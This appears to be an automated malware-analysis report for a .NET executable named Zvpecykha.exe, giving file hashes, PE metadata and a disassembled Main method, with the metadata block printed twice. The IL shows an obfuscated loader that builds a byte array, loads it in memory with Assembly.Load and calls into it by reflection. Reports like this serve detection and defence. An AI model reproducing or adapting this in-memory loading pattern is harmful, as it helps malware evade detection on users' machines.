a732fbd2e46b491e615c48c552fffecb
PE Executable | MD5: a732fbd2e46b491e615c48c552fffecb | Size: 744.96 KB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | a732fbd2e46b491e615c48c552fffecb
|
| Sha1 | 89e941959a50dad42c5f0cba5e7940a34768669e
|
| Sha256 | 273f968085b4cd46f4bd6de112fcc155cf729fe0ac68fa19ac3e8bbdaa6284ee
|
| Sha384 | eb5754f105a9a289e6e25b5f5a463309c43e0f75624edfe85fe62640a2a2ff3d7a9c52f7469fa0077123d0699d838672
|
| Sha512 | 51defff734870273a2c6d8c7add9c5bfbd5a2791410d0e808cf13eacd84db051939aa5a5f6dd4d2658453c9b86f616755070409596224eb3085219f8d8120470
|
| SSDeep | 12288:vtJHeksNc7F+Rcd1QiOmBTXrpcxSOvTyoHEFfOUTlpgrFB39DOrO:vtJONI+uuoHJYRkFWUUFBFOC
|
| TLSH | 8EF42302ACA9D493DBD987B1C9D64EA49738E6B00C15D6B87F5F860A4CDF3CB710B522
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Zvpecykha.exe |
| Full Name | Zvpecykha.exe |
| EntryPoint | System.Void Zvpecykha.Igshhu::Main() |
| Scope Name | Zvpecykha.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Zvpecykha |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 5 |
| Main Method | System.Void Zvpecykha.Igshhu::Main() |
| Main IL Instruction Count | 73 |
| Main IL | nop <null> call System.Byte[] Zvpecykha.Igshhu::HBr4bmLUU() call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Type[] System.Reflection.Assembly::GetExportedTypes() stloc.s V_3 br IL_00CD: ldc.i4.0 br IL_0025: ldloc V_0 ldc.i4 0 stloc V_0 ldloc V_0 switch dnlib.DotNet.Emit.Instruction[] ldloc V_0 ldc.i4 9 beq IL_00F9: leave IL_010E ldloc V_0 ldc.i4 989 beq IL_0025: ldloc V_0 br IL_00EF: br IL_00B8 ldloc.s V_3 ldloc.s V_1 ldelem.ref <null> stloc.s V_2 br IL_0063: nop nop <null> ldloc.s V_2 ldstr bQXLkBA5om ldc.i4 256 ldnull <null> ldnull <null> ldnull <null> callvirt System.Object System.Type::InvokeMember(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Object,System.Object[]) pop <null> br IL_007E: leave IL_0093 leave IL_0093: ldloc.s V_1 pop <null> br IL_0089: leave IL_0093 leave IL_0093: ldloc.s V_1 br IL_0093: ldloc.s V_1 ldloc.s V_1 ldc.i4.1 <null> add <null> stloc.s V_1 ldc.i4 0 ldsfld <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42} <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42}::m_6c6099b5457c4809a36f092a2ba92c52 ldfld System.Int32 <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42}::m_1dbe85608e174c8f9a859a0cfb92ee99 brtrue IL_0029: switch(IL_00B8,IL_00EF) pop <null> ldc.i4 5 br IL_0029: switch(IL_00B8,IL_00EF) ldloc.s V_1 ldloc.s V_3 ldlen <null> conv.i4 <null> blt IL_0057: ldloc.s V_3 ldc.i4 9 br IL_0021: stloc V_0 ldc.i4.0 <null> stloc.s V_1 ldc.i4 5 ldsfld <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42} <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42}::m_6c6099b5457c4809a36f092a2ba92c52 ldfld System.Int32 <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42}::m_13efa7ac5d594c0d83dc032b39687e7e brfalse IL_0029: switch(IL_00B8,IL_00EF) pop <null> ldc.i4 1 br IL_0029: switch(IL_00B8,IL_00EF) br IL_00B8: ldloc.s V_1 br IL_0057: ldloc.s V_3 leave IL_010E: ret pop <null> br IL_0104: leave IL_010E leave IL_010E: ret br IL_010E: ret ret <null> |
| Module Name | Zvpecykha.exe |
| Full Name | Zvpecykha.exe |
| EntryPoint | System.Void Zvpecykha.Igshhu::Main() |
| Scope Name | Zvpecykha.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Zvpecykha |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 5 |
| Main Method | System.Void Zvpecykha.Igshhu::Main() |
| Main IL Instruction Count | 73 |
| Main IL | nop <null> call System.Byte[] Zvpecykha.Igshhu::HBr4bmLUU() call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Type[] System.Reflection.Assembly::GetExportedTypes() stloc.s V_3 br IL_00CD: ldc.i4.0 br IL_0025: ldloc V_0 ldc.i4 0 stloc V_0 ldloc V_0 switch dnlib.DotNet.Emit.Instruction[] ldloc V_0 ldc.i4 9 beq IL_00F9: leave IL_010E ldloc V_0 ldc.i4 989 beq IL_0025: ldloc V_0 br IL_00EF: br IL_00B8 ldloc.s V_3 ldloc.s V_1 ldelem.ref <null> stloc.s V_2 br IL_0063: nop nop <null> ldloc.s V_2 ldstr bQXLkBA5om ldc.i4 256 ldnull <null> ldnull <null> ldnull <null> callvirt System.Object System.Type::InvokeMember(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Object,System.Object[]) pop <null> br IL_007E: leave IL_0093 leave IL_0093: ldloc.s V_1 pop <null> br IL_0089: leave IL_0093 leave IL_0093: ldloc.s V_1 br IL_0093: ldloc.s V_1 ldloc.s V_1 ldc.i4.1 <null> add <null> stloc.s V_1 ldc.i4 0 ldsfld <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42} <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42}::m_6c6099b5457c4809a36f092a2ba92c52 ldfld System.Int32 <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42}::m_1dbe85608e174c8f9a859a0cfb92ee99 brtrue IL_0029: switch(IL_00B8,IL_00EF) pop <null> ldc.i4 5 br IL_0029: switch(IL_00B8,IL_00EF) ldloc.s V_1 ldloc.s V_3 ldlen <null> conv.i4 <null> blt IL_0057: ldloc.s V_3 ldc.i4 9 br IL_0021: stloc V_0 ldc.i4.0 <null> stloc.s V_1 ldc.i4 5 ldsfld <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42} <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42}::m_6c6099b5457c4809a36f092a2ba92c52 ldfld System.Int32 <Module>{8930f352-e45d-43e2-a86a-3c3513b9ba42}::m_13efa7ac5d594c0d83dc032b39687e7e brfalse IL_0029: switch(IL_00B8,IL_00EF) pop <null> ldc.i4 1 br IL_0029: switch(IL_00B8,IL_00EF) br IL_00B8: ldloc.s V_1 br IL_0057: ldloc.s V_3 leave IL_010E: ret pop <null> br IL_0104: leave IL_010E leave IL_010E: ret br IL_010E: ret ret <null> |